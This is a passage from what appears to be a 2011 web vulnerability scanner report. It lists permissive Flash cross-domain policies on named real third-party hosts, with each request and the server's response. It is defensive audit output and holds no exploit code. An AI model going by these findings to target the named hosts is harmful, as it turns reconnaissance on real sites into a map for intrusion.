<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
4.40. http://puma.vizu.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:31 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n33), ht iad-agg-n33.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Fri, 17 Jun 2011 00:45:38 GMT
Age: 343973
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...
4.41. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.42. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...
4.43. http://spd.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13a5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.44. http://spe.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 14 Jun 2011 20:13:55 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
4.45. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.46. http://static0.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static0.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static0.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273420
Date: Tue, 14 Jun 2011 00:27:53 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.47. http://static1.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static1.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static1.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273676
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.48. http://static2.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static2.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static2.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273413
Date: Tue, 14 Jun 2011 00:28:00 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.49. http://static3.fluxstatic.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static3.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static3.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273213
Date: Tue, 14 Jun 2011 00:28:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.50. http://t.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:47 GMT
Accept-Ranges: bytes
ETag: "b32e768a1819cc1:0"
Server: Microsoft-IIS/7.0
Server: w01r
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wt
Date: Tue, 14 Jun 2011 00:19:51 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...
4.51. http://t.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 13 Jun 2011 14:43:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.52. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:13:56 GMT
ETag: "251523935"
Expires: Tue, 14 Jun 2011 00:43:56 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D7)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
4.53. http://viamtv.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www118
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.54. http://widgets.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:46 GMT
Accept-Ranges: bytes
ETag: "439786891819cc1:0"
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Date: Tue, 14 Jun 2011 00:27:48 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...
4.55. http://widgetsak.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetsak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgetsak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:36 GMT
ETag: "c593c6922219cc1:0"
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Cteonnt-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:28:19 GMT
Content-Length: 247
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...
4.56. http://www.forexfactory.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forexfactory.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 27 May 2011 19:47:06 GMT
ETag: "885e44-67-4a44733d3e280"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
4.57. http://www.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 17:45:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...
4.58. http://ad.wsod.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:24 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "abe2fa-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
4.59. http://advertising.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
4.60. http://api.tweetmeme.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 14 Jun 2011 00:21:20 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Tue, 14 Jun 2011 00:22:51 +0000 GMT
Etag: 9830c9adda5d9776da5ef86599d624cb
X-Served-By: h02

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...
4.61. http://cm.mtv.overture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.mtv.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...
4.62. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 13 Jun 2011 14:47:54 GMT
Date: Mon, 13 Jun 2011 14:45:54 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
4.63. http://geo.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
4.64. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 13 Jun 2011 21:32:05 GMT
Expires: Tue, 14 Jun 2011 21:32:05 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 9888
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
